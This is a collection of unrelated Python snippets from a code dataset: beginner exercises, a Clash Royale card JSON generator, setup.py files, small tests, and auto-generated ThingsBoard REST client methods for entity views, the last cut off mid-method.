#Faça um Programa que peça 2 números inteiros e um número real. Calcule e mostre:
#a) o produto do dobro do primeiro com metade do segundo .
#b) a soma do triplo do primeiro com o terceiro.
#c) o terceiro elevado ao cubo.
#-----------------------------------------------
a = int(input("Digite um número inteiro: "))  # first integer is read
b = int(input("Digite um número inteiro: "))  # second integer is read
c = float(input("Digite um número real: "))  # third (real) number is read
print("o produto do dobro do primeiro com metade do segundo: ", (a*2)*(b/2))  # product of double the first and half the second
print("a soma do triplo do primeiro com o terceiro: ", a*3+c)  # sum of triple the first and the third
print("o terceiro elevado ao cubo: ", c**3)  # the third number cubed
| StarcoderdataPython |
3200913 | # Desqafio104 o programa possui uma função que verifica se o input é um numero int
def leiaInt(num):
    """Keep prompting until *num* is a purely numeric string, then return it.

    The candidate value is passed in; whenever it fails ``str.isnumeric``
    the user is asked for a replacement.
    """
    while not num.isnumeric():
        print(f' {num} Não é um numero, digite um numero')
        print()
        num = input('Digite um numero')
    return num
# Demo: 'k' is not numeric, so leiaInt keeps prompting until a number is typed.
novo_numero = leiaInt('k')
print(novo_numero)
293622 | from .. import pytib
| StarcoderdataPython |
3297295 | """
Generate cards JSON from APK CSV source.
"""
import csv
import logging
import os
import re
from .base import BaseGen
from .util import camelcase_split
# Module-level logger.  NOTE(review): calling basicConfig at import time
# configures the root logger for the whole process -- confirm that is wanted.
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
class Cards(BaseGen):
    """Generate the cards JSON dataset from the APK CSV source files."""

    def __init__(self, config):
        super().__init__(config)

    def arena_id(self, key):
        """Return arena integer id by arena key, or None when not found."""
        csv_path = os.path.join(self.config.csv.base, self.config.csv.path.arenas)
        with open(csv_path) as f:
            texts_reader = csv.DictReader(f)
            for row in texts_reader:
                if row['Name'] == key:
                    return int(row['Arena'])
        return None

    def run(self):
        """Generate all jsons"""
        self.make_cards()

    def make_cards(self):
        """Generate cards.json"""
        cards = []
        card_num = 0
        card_keys = []

        def card_type(card_config, card_num):
            """make card dicts by type.

            Reads one card CSV, appends a dict per released card to the
            enclosing ``cards`` list and returns the updated running
            ``card_num`` counter.
            """
            csv_path = os.path.join(self.config.csv.base, card_config.csv)
            with open(csv_path, encoding="utf8") as f:
                reader = csv.DictReader(f)
                for i, row in enumerate(reader):
                    # The first data row (i == 0) is skipped; it is a
                    # secondary header row in these APK CSV exports.
                    if i > 0:
                        card_num += 1
                        process = True
                        # Rows flagged or named NotInUse are unreleased.
                        if row['NotInUse']:
                            process = False
                        elif row['Name'].lower().startswith('notinuse'):
                            process = False
                        if process:
                            # Prefer the localised English name; fall back
                            # to the internal name when no text is found.
                            name_en = self.text(row['TID'], 'EN')
                            if name_en == '':
                                name_en = row['Name']
                            if name_en is not None:
                                # Build a dash-separated key from the
                                # CamelCase name, e.g. "Ice Spirit" -> "ice-spirit".
                                name_strip = re.sub('[.\-]', '', name_en)
                                ccs = camelcase_split(name_strip)
                                key = '-'.join(s.lower() for s in ccs)
                                # card_key = '_'.join(s.lower() for s in ccs)
                                # Deck-link id is derived from the row index.
                                decklink = card_config.sckey.format(i - 1)
                                elixir = row.get('ManaCost')
                                if elixir is not None:
                                    elixir = int(elixir)
                                card = {
                                    'key': key,
                                    'name': name_en,
                                    'elixir': elixir,
                                    'type': card_config.type,
                                    'rarity': row['Rarity'],
                                    'arena': self.arena_id(row['UnlockArena']),
                                    'description': self.text(row['TID_INFO'], 'EN'),
                                    'id': int(decklink)
                                }
                                # skip unreleased cards
                                if key in ['wolf-rider', 'prison-goblin']:
                                    continue
                                # ensure unique keys — dev builds have non unique keys
                                if key not in card_keys:
                                    card_keys.append(key)
                                    cards.append(card)
                                    logger.info(card)
                                else:
                                    logger.warning( 'Duplicate card key: %s, skipping...', key )
            return card_num

        for card_config in self.config.cards:
            card_num = card_type(card_config, card_num)

        json_path = os.path.join(self.config.json.base, self.config.json.cards)
        self.save_json(cards, json_path)
| StarcoderdataPython |
1661126 | <reponame>Morabaraba/calculate
from distutils.core import setup

# Read the long description up front with a context manager so the file
# handle is closed promptly (the original leaked it from an inline open()).
with open('README.md') as readme:
    long_description = readme.read()

setup(
    name='calculate',
    version='0.1',
    packages=['calculate',],
    license='beerware',
    long_description=long_description,
)
6409474 | """Define all exceptions that occur in pysg.
"""
class Error(Exception):
    """Base class for all pysg exceptions."""
class ParameterError(Error):
    """Exception raised for invalid camera parameter.

    Attributes:
        expr: the offending expression or parameter value.
        msg: human-readable explanation of the problem.
    """

    def __init__(self, expr, msg):
        # Forward msg to Exception so str(e) and tracebacks show it
        # (previously Exception.__init__ was never given the message,
        # leaving str(e) empty).
        super().__init__(msg)
        self.expr = expr
        self.msg = msg
class PyrrTypeError(Error):
    """Exception raised for invalid pysg type.

    Attributes:
        expr: the offending expression or value.
        msg: human-readable explanation of the problem.
    """

    def __init__(self, expr, msg):
        # Forward msg to Exception so str(e) and tracebacks show it
        # (previously Exception.__init__ was never given the message,
        # leaving str(e) empty).
        super().__init__(msg)
        self.expr = expr
        self.msg = msg
11223085 | <gh_stars>1-10
from distutils.core import setup
# Package metadata for the hookah webhook event broker.
setup(
    name = "hookah",
    version="0.0.9",
    description="The webhook event broker",
    author="<NAME>",
    author_email="<EMAIL>",
    url="http://github.com/progrium/hookah/tree/master",
    download_url="http://github.com/progrium/hookah/tarball/master",
    classifiers=[
    ],
    packages=['hookah'],
    # Register the Twisted application plugin so `twistd hookah` works.
    data_files=[('twisted/plugins', ['twisted/plugins/hookah_plugin.py'])],
    scripts=['bin/hookah'],
)
| StarcoderdataPython |
3325917 | <filename>test/test_user.py
import pytest
import mock
import builtins
import user
# ToDo
def test_get_number_of_players():
    """get_number_of_players should return the integer the user typed."""
    expected_result = 2
    # Replace builtins.input so the prompt always answers "2".
    fake_input = lambda input_str: str(expected_result)
    with mock.patch.object(builtins, "input", fake_input):
        assert user.get_number_of_players() == expected_result
| StarcoderdataPython |
342612 | <reponame>lqez/pynpk
from __future__ import with_statement
import os.path
import re
from setuptools import find_packages, setup
from setuptools.command.test import test
import sys
# Best effort: read pinned dependencies from requirements.txt next to this
# file, skipping comment lines; fall back to none when the file is absent.
try:
    with open(os.path.join(os.path.dirname(__file__), 'requirements.txt')) as f:
        requirements = [i for i in f if not i.startswith('#')]
except IOError:
    requirements = []
# use pytest instead
def run_tests(self):
pyc = re.compile(r'\.pyc|\$py\.class')
test_file = pyc.sub('.py', __import__(self.test_suite).__file__)
raise SystemExit(__import__('pytest').main([test_file]))
test.run_tests = run_tests
tests_require = ['pytest']
# Trove classifiers describing the supported environments.
classifiers = [
    'Development Status :: 3 - Alpha',
    'Intended Audience :: Developers',
    'Intended Audience :: System Administrators',
    'Programming Language :: Python',
    'Programming Language :: Python :: 2.7',
    'License :: OSI Approved :: MIT License',
]
setup(
    name='pynpk',
    version='0.1.1',
    packages=['npk'],
    author='<NAME>',
    author_email='<EMAIL>' '@' 'gmail.com',
    maintainer='<NAME>',
    maintainer_email='<EMAIL>' '@' 'gmail.com',
    url='http://github.com/lqez/pynpk',
    description='pynpk',
    install_requires=requirements,
    classifiers=classifiers,
    test_suite='npktest',
    tests_require=tests_require,
)
| StarcoderdataPython |
def iloczyn_ciagu(*ciag):
    """Return the product of all arguments as a float.

    An empty argument list deliberately yields 0.0 here (not the
    mathematical empty product 1.0).
    """
    if not ciag:
        return 0.0
    wynik = 1.0
    for liczba in ciag:
        wynik *= liczba
    return wynik
# Demonstrate the product helper on an empty call and two sample sequences.
for sample in ((), (1, 2, 3, 4), tuple(range(1, 15))):
    print(iloczyn_ciagu(*sample))
| StarcoderdataPython |
# Reproject the Ghent centre point from WGS84 lon/lat (EPSG:4326) to
# Belgian Lambert 72 (EPSG:31370) by wrapping it in a one-element GeoSeries.
# Assumes `gent_centre` is a shapely geometry in lon/lat — TODO confirm.
gent_centre_31370 = geopandas.GeoSeries([gent_centre], crs="EPSG:4326").to_crs("EPSG:31370")
4917382 | from torch.testing._internal.common_utils import TestCase, run_tests
from torch.testing import check_cuda_kernel_launches, check_code_for_cuda_kernel_launches
class AlwaysCheckCudaLaunchTest(TestCase):
    """Checks the tooling that verifies every CUDA kernel launch is
    immediately followed by C10_CUDA_KERNEL_LAUNCH_CHECK()."""

    def test_check_code(self):
        """Verifies that the regex works for a few different situations"""

        # Try some different spacings
        # Exactly 2 launches below lack an immediately-following
        # C10_CUDA_KERNEL_LAUNCH_CHECK(): the back-to-back pair's first
        # launch, and the one followed by `some_other_stuff;`.
        self.assertEqual(2, check_code_for_cuda_kernel_launches("""
some_function_call<TemplateArg><<<1,2,0,stream>>>(arg1,arg2,arg3);
C10_CUDA_KERNEL_LAUNCH_CHECK();
some_function_call<TemplateArg><<<1,2,0,stream>>>(arg1,arg2,arg3);
some_function_call<TemplateArg><<<1,2,0,stream>>>(arg1,arg2,arg3);
C10_CUDA_KERNEL_LAUNCH_CHECK();
some_function_call<TemplateArg><<<1,2,0,stream>>>(arg1,arg2,arg3);
some_other_stuff;
some_function_call<TemplateArg><<<1,2,0,stream>>>(arg1,arg2,arg3);
C10_CUDA_KERNEL_LAUNCH_CHECK();
some_function_call<TemplateArg><<<1,2,0,stream>>> (arg1,arg2,arg3);
C10_CUDA_KERNEL_LAUNCH_CHECK();
some_function_call<TemplateArg><<<1,2,0,stream>>> ( arg1 , arg2 , arg3 ) ;
C10_CUDA_KERNEL_LAUNCH_CHECK();
"""))

        # Does it work for macros?
        # Both launches live inside line-continued macros whose bodies end
        # with the launch check, so nothing should be flagged.
        self.assertEqual(0, check_code_for_cuda_kernel_launches(r"""
#define SOME_MACRO(x) some_function_call<<<1,2>>> ( x ) ; \
    C10_CUDA_KERNEL_LAUNCH_CHECK();

#define SMALL_INDEX(TENSOR_TYPE, INDICES_TYPE, TYPE, SELF_DIM, SOURCE_DIM, IDX_DIM) \
    indexAddSmallIndex<TENSOR_TYPE, INDICES_TYPE, TYPE, SELF_DIM, SOURCE_DIM, IDX_DIM> \
        <<<smallIndexGrid, smallIndexBlock, 0, stream>>>( \
            selfInfo, sourceInfo, indexInfo, \
            selfAddDim, sourceAddDim, sliceSize, selfAddDimSize); \
    C10_CUDA_KERNEL_LAUNCH_CHECK();
"""))

    def test_check_cuda_launches(self):
        # Run the repository-wide scan; currently only exercised for crashes.
        check_cuda_kernel_launches()
        # TODO: Enable this after warning messages have been dealt with.
        self.assertTrue(True)
        # self.assertTrue(check_cuda_kernel_launches() == 0)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    run_tests()
| StarcoderdataPython |
6619747 | # coding: utf-8
"""
ThingsBoard REST API
ThingsBoard open-source IoT platform REST API documentation. # noqa: E501
OpenAPI spec version: 3.3.3-SNAPSHOT
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class EntityViewControllerApi(object):
    """ThingsBoard Entity View REST endpoints.

    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def assign_entity_view_to_customer_using_post(self, customer_id, entity_view_id, **kwargs): # noqa: E501
"""Assign Entity View to customer (assignEntityViewToCustomer) # noqa: E501
Creates assignment of the Entity View to customer. Customer will be able to query Entity View afterwards. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.assign_entity_view_to_customer_using_post(customer_id, entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: A string value representing the customer id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.assign_entity_view_to_customer_using_post_with_http_info(customer_id, entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.assign_entity_view_to_customer_using_post_with_http_info(customer_id, entity_view_id, **kwargs) # noqa: E501
return data
    def assign_entity_view_to_customer_using_post_with_http_info(self, customer_id, entity_view_id, **kwargs):  # noqa: E501
        """Assign Entity View to customer (assignEntityViewToCustomer)  # noqa: E501

        Creates assignment of the Entity View to customer. Customer will be able to query Entity View afterwards. Available for users with 'TENANT_ADMIN' authority.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.assign_entity_view_to_customer_using_post_with_http_info(customer_id, entity_view_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str customer_id: A string value representing the customer id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
        :param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
        :return: EntityView
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Every keyword this endpoint accepts: its own parameters plus the
        # transport options shared by all generated API methods.
        all_params = ['customer_id', 'entity_view_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Fold **kwargs into params, failing fast on unknown names so typos
        # are not silently ignored.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method assign_entity_view_to_customer_using_post" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'customer_id' is set
        if ('customer_id' not in params or
                params['customer_id'] is None):
            raise ValueError("Missing the required parameter `customer_id` when calling `assign_entity_view_to_customer_using_post`")  # noqa: E501
        # verify the required parameter 'entity_view_id' is set
        if ('entity_view_id' not in params or
                params['entity_view_id'] is None):
            raise ValueError("Missing the required parameter `entity_view_id` when calling `assign_entity_view_to_customer_using_post`")  # noqa: E501

        collection_formats = {}

        # Both ids are substituted into the URL path template below.
        path_params = {}
        if 'customer_id' in params:
            path_params['customerId'] = params['customer_id']  # noqa: E501
        if 'entity_view_id' in params:
            path_params['entityViewId'] = params['entity_view_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501

        return self.api_client.call_api(
            '/api/customer/{customerId}/entityView/{entityViewId}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='EntityView',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def assign_entity_view_to_edge_using_post(self, edge_id, entity_view_id, **kwargs): # noqa: E501
"""Assign entity view to edge (assignEntityViewToEdge) # noqa: E501
Creates assignment of an existing entity view to an instance of The Edge. Assignment works in async way - first, notification event pushed to edge service queue on platform. Second, remote edge service will receive a copy of assignment entity view (Edge will receive this instantly, if it's currently connected, or once it's going to be connected to platform). Third, once entity view will be delivered to edge service, it's going to be available for usage on remote edge instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.assign_entity_view_to_edge_using_post(edge_id, entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str edge_id: edgeId (required)
:param str entity_view_id: entityViewId (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.assign_entity_view_to_edge_using_post_with_http_info(edge_id, entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.assign_entity_view_to_edge_using_post_with_http_info(edge_id, entity_view_id, **kwargs) # noqa: E501
return data
    def assign_entity_view_to_edge_using_post_with_http_info(self, edge_id, entity_view_id, **kwargs):  # noqa: E501
        """Assign entity view to edge (assignEntityViewToEdge)  # noqa: E501

        Creates assignment of an existing entity view to an instance of The Edge. Assignment works in async way - first, notification event pushed to edge service queue on platform. Second, remote edge service will receive a copy of assignment entity view (Edge will receive this instantly, if it's currently connected, or once it's going to be connected to platform). Third, once entity view will be delivered to edge service, it's going to be available for usage on remote edge instance.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.assign_entity_view_to_edge_using_post_with_http_info(edge_id, entity_view_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str edge_id: edgeId (required)
        :param str entity_view_id: entityViewId (required)
        :return: EntityView
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Every keyword this endpoint accepts: its own parameters plus the
        # transport options shared by all generated API methods.
        all_params = ['edge_id', 'entity_view_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Fold **kwargs into params, failing fast on unknown names.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method assign_entity_view_to_edge_using_post" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'edge_id' is set
        if ('edge_id' not in params or
                params['edge_id'] is None):
            raise ValueError("Missing the required parameter `edge_id` when calling `assign_entity_view_to_edge_using_post`")  # noqa: E501
        # verify the required parameter 'entity_view_id' is set
        if ('entity_view_id' not in params or
                params['entity_view_id'] is None):
            raise ValueError("Missing the required parameter `entity_view_id` when calling `assign_entity_view_to_edge_using_post`")  # noqa: E501

        collection_formats = {}

        # Both ids are substituted into the URL path template below.
        path_params = {}
        if 'edge_id' in params:
            path_params['edgeId'] = params['edge_id']  # noqa: E501
        if 'entity_view_id' in params:
            path_params['entityViewId'] = params['entity_view_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501

        return self.api_client.call_api(
            '/api/edge/{edgeId}/entityView/{entityViewId}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='EntityView',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def assign_entity_view_to_public_customer_using_post(self, entity_view_id, **kwargs): # noqa: E501
"""Make entity view publicly available (assignEntityViewToPublicCustomer) # noqa: E501
Entity View will be available for non-authorized (not logged-in) users. This is useful to create dashboards that you plan to share/embed on a publicly available website. However, users that are logged-in and belong to different tenant will not be able to access the entity view. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.assign_entity_view_to_public_customer_using_post(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.assign_entity_view_to_public_customer_using_post_with_http_info(entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.assign_entity_view_to_public_customer_using_post_with_http_info(entity_view_id, **kwargs) # noqa: E501
return data
    def assign_entity_view_to_public_customer_using_post_with_http_info(self, entity_view_id, **kwargs):  # noqa: E501
        """Make entity view publicly available (assignEntityViewToPublicCustomer)  # noqa: E501

        Entity View will be available for non-authorized (not logged-in) users. This is useful to create dashboards that you plan to share/embed on a publicly available website. However, users that are logged-in and belong to different tenant will not be able to access the entity view. Available for users with 'TENANT_ADMIN' authority.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.assign_entity_view_to_public_customer_using_post_with_http_info(entity_view_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
        :return: EntityView
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Every keyword this endpoint accepts: its own parameter plus the
        # transport options shared by all generated API methods.
        all_params = ['entity_view_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Fold **kwargs into params, failing fast on unknown names.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method assign_entity_view_to_public_customer_using_post" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'entity_view_id' is set
        if ('entity_view_id' not in params or
                params['entity_view_id'] is None):
            raise ValueError("Missing the required parameter `entity_view_id` when calling `assign_entity_view_to_public_customer_using_post`")  # noqa: E501

        collection_formats = {}

        # The id is substituted into the URL path template below.
        path_params = {}
        if 'entity_view_id' in params:
            path_params['entityViewId'] = params['entity_view_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501

        return self.api_client.call_api(
            '/api/customer/public/entityView/{entityViewId}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='EntityView',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def delete_entity_view_using_delete(self, entity_view_id, **kwargs): # noqa: E501
"""Delete entity view (deleteEntityView) # noqa: E501
Delete the EntityView object based on the provided entity view id. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_entity_view_using_delete(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_entity_view_using_delete_with_http_info(entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.delete_entity_view_using_delete_with_http_info(entity_view_id, **kwargs) # noqa: E501
return data
    def delete_entity_view_using_delete_with_http_info(self, entity_view_id, **kwargs):  # noqa: E501
        """Delete entity view (deleteEntityView)  # noqa: E501

        Delete the EntityView object based on the provided entity view id. Available for users with 'TENANT_ADMIN' authority.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_entity_view_using_delete_with_http_info(entity_view_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Every keyword this endpoint accepts: its own parameter plus the
        # transport options shared by all generated API methods.
        all_params = ['entity_view_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Fold **kwargs into params, failing fast on unknown names.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_entity_view_using_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'entity_view_id' is set
        if ('entity_view_id' not in params or
                params['entity_view_id'] is None):
            raise ValueError("Missing the required parameter `entity_view_id` when calling `delete_entity_view_using_delete`")  # noqa: E501

        collection_formats = {}

        # The id is substituted into the URL path template below.
        path_params = {}
        if 'entity_view_id' in params:
            path_params['entityViewId'] = params['entity_view_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501

        # DELETE returns no body, hence response_type=None.
        return self.api_client.call_api(
            '/api/entityView/{entityViewId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def find_by_query_using_post4(self, **kwargs): # noqa: E501
"""Find related entity views (findByQuery) # noqa: E501
Returns all entity views that are related to the specific entity. The entity id, relation type, entity view types, depth of the search, and other query parameters defined using complex 'EntityViewSearchQuery' object. See 'Model' tab of the Parameters for more info. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_by_query_using_post4(async_req=True)
>>> result = thread.get()
:param async_req bool
:param EntityViewSearchQuery body:
:return: list[EntityView]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.find_by_query_using_post4_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.find_by_query_using_post4_with_http_info(**kwargs) # noqa: E501
return data
    def find_by_query_using_post4_with_http_info(self, **kwargs):  # noqa: E501
        """Find related entity views (findByQuery)  # noqa: E501

        Returns all entity views that are related to the specific entity. The entity id, relation type, entity view types, depth of the search, and other query parameters defined using complex 'EntityViewSearchQuery' object. See 'Model' tab of the Parameters for more info. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.find_by_query_using_post4_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param EntityViewSearchQuery body:
        :return: list[EntityView]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Every keyword this endpoint accepts: the optional body plus the
        # transport options shared by all generated API methods.
        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Fold **kwargs into params, failing fast on unknown names.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method find_by_query_using_post4" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # The EntityViewSearchQuery travels in the JSON request body.
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501

        return self.api_client.call_api(
            '/api/entityViews', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[EntityView]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_customer_entity_view_infos_using_get(self, customer_id, page_size, page, **kwargs): # noqa: E501
"""Get Customer Entity View info (getCustomerEntityViewInfos) # noqa: E501
Returns a page of Entity View info objects assigned to customer. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_entity_view_infos_using_get(customer_id, page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: A string value representing the customer id. For example, '784f394c-42b6-435a-<PASSWORD>ff<PASSWORD>' (required)
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
:param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataEntityViewInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
